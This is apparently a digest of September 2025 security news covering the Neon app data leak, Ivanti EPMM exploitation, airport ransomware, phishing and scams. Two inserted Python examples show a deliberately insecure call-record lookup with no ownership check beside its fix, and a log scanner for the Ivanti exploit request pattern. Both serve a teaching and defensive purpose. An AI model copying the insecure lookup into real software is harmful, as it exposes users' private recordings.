The pair were allegedly recruited by pro-Russian hackers and used a "wi-fi sniffer" on the Europol headquarters.

Two 17-year-old boys have been arrested on suspicion of "state interference" in the Netherlands, prosecutors say, in a case with reported links to Russian spying.

The pair were allegedly contacted by pro-Russian hackers on the messaging app Telegram, Dutch media reported.

One of the boys allegedly walked past the offices of Europol, Eurojust and the Canadian embassy in The Hague carrying a "wi-fi sniffer" - a device designed to identify and intercept wi-fi networks.

The teenagers appeared before a judge on Thursday, who ordered one boy be remanded in custody and the other placed on strict home bail conditions until a hearing, which is due to take place in the next two weeks.

The National Office of the Netherlands Public Prosecution Service confirmed the court appearance, but told the BBC it could not provide details on the case due to the suspects' age and in "the interest of the investigation", which is ongoing.

The father of one of the boys told Dutch newspaper De Telegraaf that police had arrested his son on Monday afternoon while he was doing his homework.

He said police told him that the arrest related to espionage and rendering services to a foreign country, the paper reports.

The teenager was described as being computer savvy and having a fascination for hacking, while holding a part-time job at a supermarket.

The Netherlands' domestic intelligence and security agency declined to comment on the case when approached by the BBC.

bbc.com EN 2025 wifi-sniffer Europol spying Russia teenagers
Viral call-recording app Neon goes dark after exposing users' phone numbers, call recordings, and transcripts https://techcrunch.com/2025/09/25/viral-call-recording-app-neon-goes-dark-after-exposing-users-phone-numbers-call-recordings-and-transcripts/
26/09/2025 10:42:09

TechCrunch techcrunch.com
Zack Whittaker
Sarah Perez
2:10 PM PDT · September 25, 2025

Call recording app Neon was one of the top-ranked iPhone apps, but was pulled offline after a security bug allowed any logged-in user to access the call recordings and transcripts of any other user.

A viral app called Neon, which offers to record your phone calls and pay you for the audio so it can sell that data to AI companies, has rapidly risen to the ranks of the top-five free iPhone apps since its launch last week.

The app already has thousands of users and was downloaded 75,000 times yesterday alone, according to app intelligence provider Appfigures. Neon pitches itself as a way for users to make money by providing call recordings that help train, improve, and test AI models.

But Neon has gone offline, at least for now, after a security flaw allowed anyone to access the phone numbers, call recordings, and transcripts of any other user, TechCrunch can now report.

TechCrunch discovered the security flaw during a short test of the app on Thursday. We alerted the app’s founder, Alex Kiam (who previously did not respond to a request for comment about the app), to the flaw soon after our discovery.

Kiam told TechCrunch later Thursday that he took down the app’s servers and began notifying users about pausing the app, but fell short of informing his users about the security lapse.

The Neon app stopped functioning soon after we contacted Kiam.

Call recordings and transcripts exposed
At fault was the fact that the Neon app’s servers were not preventing any logged-in user from accessing someone else’s data.

TechCrunch created a new user account on a dedicated iPhone and verified a phone number as part of the sign-up process. We used a network traffic analysis tool called Burp Suite to inspect the network data flowing in and out of the Neon app, allowing us to understand how the app works at a technical level, such as how the app communicates with its back-end servers.

After making some test phone calls, the app showed us a list of our most recent calls and how much money each call earned. But our network analysis tool revealed details that were not visible to regular users in the Neon app. These details included the text-based transcript of the call and a web address to the audio files, which anyone could publicly access as long as they had the link.

For example, here you can see the transcript from our test call between two TechCrunch reporters confirming that the recording worked properly.

Image (credit: TechCrunch): a JSON response from Neon Mobile's server containing the transcript text of a call between two TechCrunch reporters, which reads: "Uh, it worked. Hooray. Okay. Thanks, mate."
But the back-end servers were also capable of spitting out reams of other people’s call recordings and their transcripts.

In one case, TechCrunch found that the Neon servers could produce data about the most recent calls made by the app’s users, as well as providing public web links to their raw audio files and the transcript text of what was said on the call. (The audio files contain recordings of just those who installed Neon, not those they contacted.)

Similarly, the Neon servers could be manipulated to reveal the most recent call records (also known as metadata) from any of its users. This metadata contained the user’s phone number and the phone number of the person they’re calling, when the call was made, its duration, and how much money each call earned.

A review of a handful of transcripts and audio files suggests some users may be using the app to make lengthy calls that covertly record real-world conversations with other people in order to generate money through the app.
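The flaw described above is a missing object-level authorisation check: the back end authenticates the session but fetches records by id without confirming that the caller owns them, and media links are permanent public URLs. The following is an added example, not TechCrunch's code nor Neon's real back end: a minimal in-memory call-record API that shows the broken handler beside the corrected one, a listing endpoint scoped to the server-side identity, and a short-lived signed link in place of a permanent public audio URL. Account ids, phone numbers, transcripts, paths and the signing key are all constructed for the example.

```python
"""Broken object-level authorisation beside its fix (added example; the
data, ids and signing key below are constructed, not Neon's)."""
import hashlib
import hmac
import time
from dataclasses import dataclass


class Forbidden(Exception):
    """Raised when a session asks for a record it does not own."""


@dataclass(frozen=True)
class CallRecord:
    call_id: int
    owner_id: str        # account that made the recording
    peer_number: str     # constructed sample metadata
    transcript: str
    audio_path: str


# Constructed sample data: two accounts, one recording each.
CALLS = {
    1: CallRecord(1, "user-a", "+15550000001", "Uh, it worked. Hooray.", "/audio/1.m4a"),
    2: CallRecord(2, "user-b", "+15550000002", "private conversation", "/audio/2.m4a"),
}

# Assumption: a server-side secret used to sign media links (constructed value).
SIGNING_KEY = b"constructed-demo-key-do-not-reuse"


def get_call_vulnerable(session_user: str, call_id: int) -> dict:
    """The broken pattern: the session is authenticated, but the record is
    fetched by id alone, so any logged-in user who enumerates call ids reads
    every other user's number, transcript and audio link."""
    rec = CALLS[call_id]
    return {"call_id": rec.call_id, "peer": rec.peer_number,
            "transcript": rec.transcript, "audio": rec.audio_path}


def _owned_record(session_user: str, call_id: int) -> CallRecord:
    """Scope the lookup to the caller. A record that exists but belongs to
    someone else is treated exactly like one that does not exist, so the
    response cannot be used to confirm other users' call ids."""
    rec = CALLS.get(call_id)
    if rec is None or rec.owner_id != session_user:
        raise Forbidden(f"call {call_id} is not visible to {session_user}")
    return rec


def can_access(session_user: str, call_id: int) -> bool:
    """Boolean form of the ownership check, convenient for tests and audits."""
    try:
        _owned_record(session_user, call_id)
        return True
    except Forbidden:
        return False


def get_call(session_user: str, call_id: int) -> dict:
    """The fixed handler: same response shape, ownership enforced first."""
    rec = _owned_record(session_user, call_id)
    return {"call_id": rec.call_id, "peer": rec.peer_number,
            "transcript": rec.transcript, "audio": rec.audio_path}


def list_recent_calls(session_user: str) -> list:
    """Listing endpoint: filter by the server-side session identity, never by
    a user id supplied in the request."""
    return sorted(c.call_id for c in CALLS.values() if c.owner_id == session_user)


def signed_audio_url(session_user: str, call_id: int, ttl: int = 300, now: float = None) -> str:
    """Replace the permanent public audio link with a short-lived signed one,
    issued only after the ownership check has passed."""
    rec = _owned_record(session_user, call_id)
    exp = int((time.time() if now is None else now) + ttl)
    sig = hmac.new(SIGNING_KEY, f"{rec.audio_path}|{exp}".encode(), hashlib.sha256).hexdigest()
    return f"{rec.audio_path}?exp={exp}&sig={sig}"


def verify_audio_url(url: str, now: float = None) -> bool:
    """Media-server side: reject expired or tampered links; the comparison is
    constant-time so the signature cannot be recovered byte by byte."""
    path, _, query = url.partition("?")
    params = dict(kv.split("=", 1) for kv in query.split("&") if "=" in kv)
    try:
        exp = int(params["exp"])
    except (KeyError, ValueError):
        return False
    if (time.time() if now is None else now) > exp:
        return False
    expected = hmac.new(SIGNING_KEY, f"{path}|{exp}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, params.get("sig", ""))
```

Two design points are worth noting. The fixed lookup returns the same error for "does not exist" and "belongs to someone else", so the endpoint cannot be used to enumerate valid call ids. The signed link binds the path to an expiry under a server secret, so possessing a link no longer grants indefinite access to the recording and a link copied from one user's traffic cannot be rewritten to point at another user's file.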

App shuts down, for now
Soon after we alerted Neon to the flaw on Thursday, the company’s founder, Kiam, sent out an email to customers alerting them to the app’s shutdown.

“Your data privacy is our number one priority, and we want to make sure it is fully secure even during this period of rapid growth. Because of this, we are temporarily taking the app down to add extra layers of security,” the email, shared with TechCrunch, reads.

Notably, the email makes no mention of a security lapse or that it exposed users’ phone numbers, call recordings, and call transcripts to any other user who knew where to look.

It’s unclear when Neon will come back online or whether this security lapse will gain the attention of the app stores.

Apple and Google have not yet commented following TechCrunch’s outreach about whether or not Neon was compliant with their respective developer guidelines.

However, this would not be the first time that an app with serious security issues has made it onto these app marketplaces. Recently, a popular mobile dating companion app, Tea, experienced a data breach, which exposed its users’ personal information and government-issued identity documents. Popular apps like Bumble and Hinge were caught in 2024 exposing their users’ locations. Both stores also have to regularly purge malicious apps that slip past their app review processes.

When asked, Kiam did not immediately say if the app had undergone any security review ahead of its launch, and if so, who performed the review. Kiam also did not say, when asked, if the company has the technical means, such as logs, to determine if anyone else found the flaw before us or if any user data was stolen.

TechCrunch additionally reached out to Upfront Ventures and Xfund, which Kiam claims in a LinkedIn post have invested in his app. Neither firm has responded to our requests for comment as of publication.

techcrunch.com EN 2025 call-recording app Neon transcripts data-leak
Microsoft blocks Israel’s use of its technology in mass surveillance of Palestinians | Israel | The Guardian https://www.theguardian.com/world/2025/sep/25/microsoft-blocks-israels-use-of-its-technology-in-mass-surveillance-of-palestinians
26/09/2025 10:41:35

Exclusive: Tech firm ends military unit’s access to AI and data services after Guardian reveals secret spy project

Microsoft has terminated the Israeli military’s access to technology it used to operate a powerful surveillance system that collected millions of Palestinian civilian phone calls made each day in Gaza and the West Bank, the Guardian can reveal.

Microsoft told Israeli officials late last week that Unit 8200, the military’s elite spy agency, had violated the company’s terms of service by storing the vast trove of surveillance data in its Azure cloud platform, sources familiar with the situation said.

The decision to cut off Unit 8200’s ability to use some of its technology results directly from an investigation published by the Guardian last month. It revealed how Azure was being used to store and process the trove of Palestinian communications in a mass surveillance programme.

In a joint investigation with the Israeli-Palestinian publication +972 Magazine and the Hebrew-language outlet Local Call, the Guardian revealed how Microsoft and Unit 8200 had worked together on a plan to move large volumes of sensitive intelligence material into Azure.

The project began after a meeting in 2021 between Microsoft’s chief executive, Satya Nadella, and the unit’s then commander, Yossi Sariel.

In response to the investigation, Microsoft ordered an urgent external inquiry to review its relationship with Unit 8200. Its initial findings have now led the company to cancel the unit’s access to some of its cloud storage and AI services.

Equipped with Azure’s near-limitless storage capacity and computing power, Unit 8200 had built an indiscriminate new system allowing its intelligence officers to collect, play back and analyse the content of cellular calls of an entire population.

The project was so expansive that, according to sources from Unit 8200 – which is equivalent in its remit to the US National Security Agency – a mantra emerged internally that captured its scale and ambition: “A million calls an hour.”

According to several sources, the enormous repository of intercepted calls – which amounted to as much as 8,000 terabytes of data – was held in a Microsoft datacentre in the Netherlands. Within days of the Guardian publishing the investigation, Unit 8200 appears to have swiftly moved the surveillance data out of the country.

According to sources familiar with the huge data transfer outside of the EU country, it occurred in early August. Intelligence sources said Unit 8200 planned to transfer the data to the Amazon Web Services cloud platform. Neither the Israel Defense Forces (IDF) nor Amazon responded to a request for comment.

The extraordinary decision by Microsoft to end the spy agency’s access to key technology was made amid pressure from employees and investors over its work for Israel’s military and the role its technology has played in the almost two-year offensive in Gaza.

A United Nations commission of inquiry recently concluded that Israel had committed genocide in Gaza, a charge denied by Israel but supported by many experts in international law.

The Guardian’s joint investigation prompted protests at Microsoft’s US headquarters and one of its European datacentres, as well as demands by a worker-led campaign group, No Azure for Apartheid, to end all ties to the Israeli military.

Image: No Azure for Apartheid demonstrators
On Thursday, Microsoft’s vice-chair and president, Brad Smith, informed staff of the decision. In an email seen by the Guardian, he said the company had “ceased and disabled a set of services to a unit within the Israel ministry of defense”, including cloud storage and AI services.

Smith wrote: “We do not provide technology to facilitate mass surveillance of civilians. We have applied this principle in every country around the world, and we have insisted on it repeatedly for more than two decades.”

The decision brings to an abrupt end a three-year period in which the spy agency operated its surveillance programme using Microsoft’s technology.

Unit 8200 used its own expansive surveillance capabilities to intercept and collect the calls. The spy agency then used a customised and segregated area within the Azure platform, allowing for the data to be retained for extended periods of time and analysed using AI-driven techniques.

Although the initial focus of the surveillance system was the West Bank, where an estimated 3 million Palestinians live under Israeli military occupation, intelligence sources said the cloud-based storage platform had been used in the Gaza offensive to facilitate the preparation of deadly airstrikes.

The revelations highlighted how Israel has relied on the services and infrastructure of major US technology companies to support its bombardment of Gaza, which has killed more than 65,000 Palestinians, mostly civilians, and created a profound humanitarian and starvation crisis.

theguardian.com EN 2025 Microsoft Israel mass-surveillance
Malicious Listener for Ivanti Endpoint Mobile Management Systems | CISA https://www.cisa.gov/news-events/analysis-reports/ar25-261a?_bhlid=31978a5314fdac135e534054ad2099eb310834d0
25/09/2025 14:53:05

cisa.gov

The Cybersecurity and Infrastructure Security Agency (CISA) obtained two sets of malware, five files in total, from an organization where cyber threat actors exploited CVE-2025-4427 [CWE-288: Authentication Bypass Using an Alternate Path or Channel] and CVE-2025-4428 [CWE-‘Code Injection’] in Ivanti Endpoint Manager Mobile (Ivanti EPMM) deployments for initial access.

Note: Ivanti provided a patch and disclosed the vulnerabilities on May 13, 2025. CISA added both vulnerabilities to its Known Exploited Vulnerabilities Catalog on May 19, 2025.

Around May 15, 2025, following publication of a proof of concept, the cyber threat actors gained access to the server running EPMM by chaining these vulnerabilities. The cyber threat actors targeted the /mifs/rs/api/v2/ endpoint with HTTP GET requests and used the ?format= parameter to send malicious remote commands. The commands enabled the threat actors to collect system information, download malicious files, list the root directory, map the network, execute scripts to create a heapdump, and dump Lightweight Directory Access Protocol (LDAP) credentials.

CISA analyzed two sets of malicious files the cyber threat actors wrote to the /tmp directory. Each set of malware enabled persistence by allowing the cyber threat actors to inject and run arbitrary code on the compromised server.

CISA encourages organizations to use the indicators of compromise (IOCs) and detection signatures in this Malware Analysis Report to identify malware samples. If identified, follow the guidance in the Incident Response section of this Malware Analysis Report. Additionally, organizations should ensure they are running the latest version of Ivanti EPMM as soon as possible.
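The report gives defenders one concrete request pattern to look for: HTTP GET requests to the /mifs/rs/api/v2/ endpoint carrying a ?format= parameter used to deliver commands. The following is an added example, not CISA's detection signature and not Ivanti's code: a heuristic scan of web-server access logs (combined log format, sample lines constructed here) that flags such requests whose format value is anything other than a short plain token. That "normal" shape is an assumption rather than Ivanti documentation, so the token pattern should be tuned against your own baseline, and the IOCs and signatures in the report itself remain the authoritative detection content.

```python
"""Heuristic access-log scan for abnormal ?format= values on /mifs/rs/api/v2/
(added example; sample log lines and the resource name "items" are constructed,
and the expected token shape of a legitimate format value is an assumption)."""
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" format: client, identity, user, [timestamp], "request", status, bytes.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)'
)
# Assumption: a legitimate format value is a short alphanumeric token.
TOKEN_RE = re.compile(r'^[A-Za-z0-9_-]{1,16}$')
WATCHED_PREFIX = "/mifs/rs/api/v2/"

# Constructed sample log: one benign call, one abnormal value, unrelated traffic, and a POST.
SAMPLE_LOG = """\
203.0.113.5 - - [15/May/2025:10:01:02 +0000] "GET /mifs/rs/api/v2/items?format=json HTTP/1.1" 200 512
203.0.113.9 - - [15/May/2025:10:01:07 +0000] "GET /mifs/rs/api/v2/items?format=CONSTRUCTED%28placeholder%29 HTTP/1.1" 200 2048
203.0.113.9 - - [15/May/2025:10:01:09 +0000] "GET /mifs/login.jsp HTTP/1.1" 200 1024
203.0.113.9 - - [15/May/2025:10:01:11 +0000] "POST /mifs/rs/api/v2/items?format=json HTTP/1.1" 401 0
"""


def parse_line(line: str):
    """Return the log fields as a dict, or None when the line is not a combined-format entry."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_format_values(target: str) -> list:
    """Decode the query string of a request target and return every format=
    value on the watched path that does not look like a plain token."""
    parts = urlsplit(target)
    if not parts.path.startswith(WATCHED_PREFIX):
        return []
    values = parse_qs(parts.query, keep_blank_values=True).get("format", [])
    return [v for v in values if not TOKEN_RE.match(v)]


def scan(log_text: str) -> list:
    """Walk the log and collect GET requests (the method the report names)
    whose format parameter fails the token check; each hit keeps the client,
    timestamp and full target so it can be pivoted on during triage."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["method"] != "GET":
            continue
        bad = suspicious_format_values(rec["target"])
        if bad:
            hits.append({"client": rec["client"], "ts": rec["ts"],
                         "target": rec["target"], "values": bad})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['client']} {hit['target']} -> {hit['values']}")
```

A hit here is a triage lead, not a verdict: a flagged client should be correlated with the report's IOCs, with writes to /tmp on the EPMM host, and with outbound connections from the appliance around the same timestamps.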

cisa.gov EN 2025 Ivanti CVE-2025-4427 CVE-2025-4428 EPMM
Press release: cyberattack and data theft https://www.fftt.com/site/actualites/2025-09-19/communique-cyberattaque-et-vol-de-donnees
24/09/2025 19:19:14

Press release: cyberattack and data theft
Published: 19/09/2025
Modified: 19/09/2025
The Fédération Française de Tennis de Table reports that it has been the victim of a cyberattack and data theft: all our licence holders are advised to remain vigilant.

The FFTT recently suffered a computer attack compromising the security of its licence holders' personal data.

Unauthorised access through the use of a compromised account allowed bulk retrieval of information from our licence-holder database. The data concerned includes in particular licence number, surname, first name, gender, date and place of birth and nationality, as well as contact details such as postal address, email address and telephone number. However, no banking details or health data were affected.

The FFTT deeply regrets this situation and wishes to assure everyone that all of its departments are mobilised to manage this intrusion. The federal IT department is working, in collaboration with its technical providers, to correct this security flaw.

This incident calls for heightened vigilance from licence holders in the face of the potential risks that follow from it (phishing, scam attempts or identity theft).

The FFTT therefore invites its members to exercise the greatest caution regarding any communications they may receive, in particular any suspicious or unusual message appearing to come from the FFTT or from another sender (an invitation to open a suspicious attachment or to disclose your account details, passwords or banking details).

All information on good practices against cybercrime.

The FFTT will send a communication to the persons concerned.

A complaint has been filed and the competent authorities have been informed (ANSSI, CNIL).

For any further information regarding this event, the federation's services can be reached by email at the following address: cyber@fftt.org

fftt.com FR 2025 France cyberattaque FFTT data-breach
SonicWall releases SMA100 firmware update to wipe rootkit malware https://www.bleepingcomputer.com/news/security/sonicwall-releases-sma100-firmware-update-to-wipe-rootkit-malware/
24/09/2025 19:11:11

bleepingcomputer.com
by Sergiu Gatlan
September 23, 2025

SonicWall has released a firmware update that can help customers remove rootkit malware deployed in attacks targeting SMA 100 series devices.

"SonicWall SMA 100 10.2.2.2-92sv build has been released with additional file checking, providing the capability to remove known rootkit malware present on the SMA devices," the company said in a Monday advisory.

"SonicWall strongly recommends that users of the SMA 100 series products (SMA 210, 410, and 500v) upgrade to the 10.2.2.2-92sv version."

The update follows a July report from researchers at the Google Threat Intelligence Group (GTIG), who observed a threat actor tracked as UNC6148 deploying OVERSTEP malware on end-of-life (EoL) SonicWall SMA 100 devices that will reach end-of-support next week, on October 1, 2025.

OVERSTEP is a user-mode rootkit that enables attackers to maintain persistent access by using hidden malicious components and establishing a reverse shell on compromised devices. The malware steals sensitive files, including the persist.database and certificate files, providing hackers with access to credentials, OTP seeds, and certificates that further enable persistence.

While the researchers have not determined the goal behind UNC6148's attacks, they did find "noteworthy overlaps" with Abyss-related ransomware incidents.

For instance, in late 2023, Truesec investigated an Abyss ransomware incident in which hackers installed a web shell on an SMA appliance, enabling them to maintain persistence despite firmware updates. In March 2024, InfoGuard AG incident responder Stephan Berger reported a similar SMA device compromise that also resulted in the deployment of Abyss malware.

"The threat intelligence report from Google Threat Intelligence Group (GTIG) highlights potential risk of using older versions of SMA100 firmware," SonicWall added on Monday, urging admins to implement the security measures outlined in this July advisory.

Last week, SonicWall warned customers to reset credentials after their firewall configuration backup files were exposed in brute-force attacks targeting the API service for cloud backup.

In August, the company also dismissed claims that the Akira ransomware gang was hacking Gen 7 firewalls using a potential zero-day exploit, clarifying that the issue was tied to a critical vulnerability (CVE-2024-40766) that was patched in November 2024.

The Australian Cyber Security Centre (ACSC) and cybersecurity firm Rapid7 later confirmed that the Akira gang is exploiting this vulnerability to target unpatched SonicWall devices.

bleepingcomputer.com EN 2025 Malware Rootkit Software-Update SonicWall
Man arrested in connection with cyber-attack on airports https://www.bbc.com/news/articles/c62ldxyj431o
24/09/2025 19:08:38

bbc.com
Imran Rahman-Jones, Technology reporter, and Joe Tidy, Cyber correspondent, BBC World Service

The National Crime Agency (NCA) said a man in his forties was arrested in West Sussex.

A person has been arrested in connection with a cyber-attack which has caused days of disruption at several European airports including Heathrow.

The National Crime Agency (NCA) said a man in his forties was arrested in West Sussex "as part of an investigation into a cyber incident impacting Collins Aerospace".

There have been hundreds of flight delays after Collins Aerospace baggage and check-in software used by several airlines failed, with some boarding passengers using pen and paper.

"Although this arrest is a positive step, the investigation into this incident is in its early stages and remains ongoing," said Paul Foster, head of the NCA's national cyber crime unit.

The man was arrested on Tuesday evening on suspicion of Computer Misuse Act offences and has been released on bail.

The BBC has seen an internal memo sent to airport staff at Heathrow about the difficulties software provider Collins Aerospace is having bringing their check-in software back online.

The US company appears to be rebuilding the system again after trying to relaunch it on Monday.

Collins Aerospace's parent company RTX Corporation told the BBC it appreciated the NCA's "ongoing assistance in this matter".

The US firm has not put a timeline on when it will be ready and is urging ground handlers and airlines to plan for at least another week of using manual workarounds.

At Heathrow, extra staff have been deployed in terminals to help passengers and check-in operators but flights are still experiencing delays.

On Monday, the EU's cyber-security agency said ransomware had been deployed in the attack.

Ransomware is often used to seriously disrupt victims' systems and a ransom is demanded in cryptocurrency to reverse the damage.

These types of attacks are an issue for organisations around the country, with organised cyber-crime gangs earning hundreds of millions of pounds from ransoms every year.

Days of disruption
The attack against US software maker Collins Aerospace was discovered on Friday night and resulted in disruption across many European airports, including in Brussels, Dublin and Berlin.

Flights were cancelled and delayed throughout the weekend, with some airports still experiencing effects of the delays into this week.

"The vast majority of flights at Heathrow are operating as normal, but we encourage passengers to check the status of their flight before travelling to the airport," Heathrow Airport said in a statement on its website.

Berlin Airport said on Wednesday morning "check-in and boarding are still largely manual", which would result in "longer processing times, delays, and cancellations by airlines".

Brussels Airport, meanwhile, advised passengers to check in online before arriving at the airport.

Cyber-attacks in the aviation sector have increased by 600% over the past year, according to a report by French aerospace company Thales.

bbc.com EN 2025 NCA Airport Collins Aerospace European airports cyberattack
EU cyber agency says airport software held to ransom by criminals https://www.bbc.com/news/articles/cqjeej85452o?is=e4f6b16c6de31130985364bb824bcb39ef6b2c4e902e4e553f0ec11bdbefc118
24/09/2025 08:50:45

bbc.com Joe Tidy, Cyber correspondent, and Tabby Wilson

The EU's cyber security agency says criminals are using ransomware to cause chaos in airports around the world.

Several of Europe's busiest airports have spent the past few days trying to restore normal operations, after a cyber-attack on Friday disrupted their automatic check-in and boarding software.

The European Union Agency for Cybersecurity, ENISA, told the BBC on Monday that the malicious software was used to scramble automatic check-in systems.

"The type of ransomware has been identified. Law enforcement is involved to investigate," the agency said in a statement to news agency Reuters.

It's not known who is behind the attack, but criminal gangs often use ransomware to seriously disrupt their victims' systems and demand a ransom in bitcoin to reverse the damage.

The BBC has seen internal crisis communications from staff inside Heathrow Airport which urge airlines to continue to use manual workarounds to board and check in passengers while the recovery is ongoing.

Heathrow said on Sunday it was still working to resolve the issue, and apologised to customers who had faced delayed travel.

It stressed "the vast majority of flights have continued to operate" and urged passengers to check their flight status before travelling to the airport.

The BBC understands about half of the airlines flying from Heathrow were back online in some form by Sunday - including British Airways, which has been using a back-up system since Saturday.

Continued disruption
The attack against US software maker Collins Aerospace was discovered on Friday night and resulted in disruption across several airports on Saturday.

While this had eased significantly in Berlin and London Heathrow by Sunday, delays and flight cancellations remained.

Brussels Airport, also affected, said the "service provider is actively working on the issue" but it was still "unclear" when the issue would be resolved.

They have asked airlines to cancel nearly 140 of their 276 scheduled outbound flights for Monday, according to the AP news agency.

Meanwhile, a Berlin Airport spokesperson told the BBC some airlines were still boarding passengers manually and it had no indication on how long the electronic outage would last.

bbc.com EN 2025 Collins Aerospace ransomware
What happens when a cybersecurity company gets phished? – Sophos News https://news.sophos.com/en-us/2025/09/22/what-happens-when-a-cybersecurity-company-gets-phished/
23/09/2025 20:55:46

news.sophos.com
Written by Ross McKerchar
September 22, 2025

A Sophos employee was phished, but we countered the threat with an end-to-end defense process
If you work in cybersecurity, you’ve probably heard the time-honored adage about cyber attacks: “It’s not a matter of if, but when.” Perhaps a better way to think of it is this: while training, experience, and familiarity with social engineering techniques help, anyone can fall for a well-constructed ruse. Everyone – including security researchers – has a vulnerability that could make them susceptible, given the right situation, timing, and circumstances.

Cybersecurity companies aren’t immune by any means. In March 2025, a senior Sophos employee fell victim to a phishing email and entered their credentials into a fake login page, leading to a multi-factor authentication (MFA) bypass and a threat actor trying – and failing – to worm their way into our network.

We’ve published an external root cause analysis (RCA) about this incident on our Trust Center, which dives into the details – but the incident raised some interesting broader topics that we wanted to share some thoughts on.

First, it’s important to note that MFA bypasses are increasingly common. As MFA has become more widespread, threat actors have adapted, and several phishing frameworks and services now incorporate MFA bypass capabilities (another argument for the wider adoption of passkeys).

Second, we’re sharing the details of this incident not to highlight that we successfully repelled an attack – that’s our day job – but because it’s a good illustration of an end-to-end defense process, and has some interesting learning points.

Third, three things were key to our response: controls, cooperation, and culture.

Controls
Our security controls are layered, with the objective of being resilient to human failure and bypasses of earlier layers. The guiding principle behind a ‘defense-in-depth’ security policy is that when one control is bypassed, or fails, others should kick in – providing protection across as much of the cyber kill chain as possible.

As we discussed in the corresponding RCA, this incident involved multiple layers – email security, MFA, a Conditional Access Policy (CAP), device management, and account restrictions. While the threat actor bypassed some of those layers, subsequent controls were then triggered.

Crucially, however, we didn’t sit on our laurels after the incident. The threat actor was unsuccessful, but we didn’t congratulate ourselves and get on with our day. We investigated every aspect of the attack, conducted an internal root cause analysis, and assessed the performance of every control involved. Where a control was bypassed, we reviewed why this was the case and what we could do to improve it. Where a control worked effectively, we asked ourselves what threat actors might do in the future to bypass it, and then investigated how to mitigate against that.

Cooperation
Our internal teams work closely together all the time, and one of the key outcomes of that is a cooperative culture – particularly when there’s an urgent and active threat, whether internal or affecting our customers.

Sophos Labs, Managed Detection and Response (MDR), Internal Detection and Response (IDR), and our internal IT team worked within their different specialties and areas of expertise to eliminate the threat, sharing information and insights. Going forward, we’re looking at ways to improve our intelligence-gathering capabilities and tightening feedback loops – not just internally, but within the wider security community. Ingesting and operationalizing intelligence, making it actionable, and proactively using it to defend our estate, is a key priority. While we responded effectively to this incident, we can always be better.

Culture
We try to foster a culture in which the predominant focus is solving the problem and making things safe, rather than apportioning blame or criticizing colleagues for mistakes – and we don’t reprimand or discipline users who click on phishing links.

The employee in this incident felt able to directly inform colleagues that they had fallen for a phishing lure. In some organizations, users may not feel comfortable admitting to a mistake, whether that’s due to fear of reprisal or personal embarrassment. Others may hope that if they ignore a suspicious incident, the problem will go away. At Sophos, all users – whatever their role and level of seniority – are encouraged to report any suspicions. As we noted at the beginning of this article, we know that anyone can fall for a social engineering ruse given the right circumstances.

It’s often said – not necessarily helpfully – that humans are the weakest link in security. But they are also often the first line of defense, and can play a vital part in notifying security teams, validating automated alerts (or even alerting security themselves if technical controls fail), and providing additional context and intelligence.

Conclusion
An attacker breached our perimeter, but a combination of controls, cooperation, and culture meant that they were severely restricted in what they could do, before we removed them from our systems. Our post-incident review, and the lessons we took from it, means that our security posture is stronger, in readiness for the next attempt. By publicly and transparently sharing those lessons both here and in the RCA, we hope yours will be too.

news.sophos.com EN 2025 sophos employee phished
Week 38: Beware of Daniel Bruno, supposed NCSC employee https://www.ncsc.admin.ch/ncsc/fr/home/aktuell/im-fokus/2025/wochenrueckblick_38.html
23/09/2025 20:53:45

ncsc.admin.ch OFCS CH

23.09.2025 - Last week, the Federal Office for Cybersecurity (OFCS) received several reports of recovery scams. In this scam, cybercriminals get back in touch with people who have already fallen victim to investment fraud. They claim to have "recovered" the lost money and urge the victims to make a payment in order to get it back. To give their attempt an official appearance, they often use the names of public institutions, for example by posing as a supposed NCSC employee.

Not content with having pulled off an investment fraud, the scammers sometimes drive the point home. After some time, they get back in touch with a victim and promise to return their money. This is, however, a new scam, which costs the targeted people even more money. This fraudulent practice is also known as a recovery scam or refund scam. In the cases currently reported to the OFCS, the emails are sent not only to former victims but also to other random recipients, in the hope of provoking a reaction. To lend more credibility to their approach, the scammers often claim to work for a security provider or a law enforcement authority. They sometimes also impersonate an employee. In some cases these are real people, in others fictitious employees. Last week, the scammers repeatedly posed as Daniel Bruno, a supposed NCSC employee. In his email, the fake NCSC inspector claims to be responsible for refunding lost money to scam victims.

An official-looking email or phone call
The perpetrators bolster their dubious legitimacy by using professional-looking forged documents to deceive their victims. It all begins with a phone call or an email. In the recently reported cases, the scammers use a forged identity card. It contains the following details: Daniel Bruno, "Senior Asset Investigator" at the "National Cyber Security Centre". The logos of several organisations, a fictitious ID number and an expiry date also appear on the card to vouch for its authenticity. The fake Daniel Bruno contacts his victim by email or phone, claiming to be cooperating with foreign authorities such as the UK financial regulator ("Financial Conduct Authority FCA"), which can suggest a large-scale international operation.

The address used, in this specific case a Gmail address, should arouse suspicion: government agencies never use generic webmail providers to communicate. In the message, the victim learns that during an investigation their name was found in the client file of a rogue broker and that a substantial sum of money is ready to be refunded to them (e.g. an amount of 220,600 USDT, a well-known cryptocurrency pegged to the US dollar).

Raising public awareness of simple fraud attempts forces cybercriminals to become ever more ingenious. As people grow more suspicious of basic phishing emails, scammers have to refine their methods in order to deceive potential victims. Carefully prepared documents and references to real authorities can convince even the most wary.

The strategy of posing as an NCSC employee is particularly insidious. The scammers deliberately abuse the trust that victims place in the very institution they are supposed to turn to when confronted with cybercrime. They thus trap victims in the very place where they expect to find help.

The Federal Office for Cybersecurity, NCSC in English, confirms: Daniel Bruno does not work for the NCSC or any related authority, either in Switzerland or in the United Kingdom. All associated documents are forged. The OFCS never spontaneously contacts citizens promising a refund in exchange for an advance payment.

The scammer always rings twice
The Daniel Bruno case is an example of a recovery scam. Other examples have already been presented in previous editions of the OFCS weekly review (e.g. the weekly review of week 38/2024).

The scam unfolds in two stages:

Initial fraud: the victim loses money to some form of online scam, for example cryptocurrency investment fraud, a fee scam tied to a supposed lottery win, or a phishing attack.
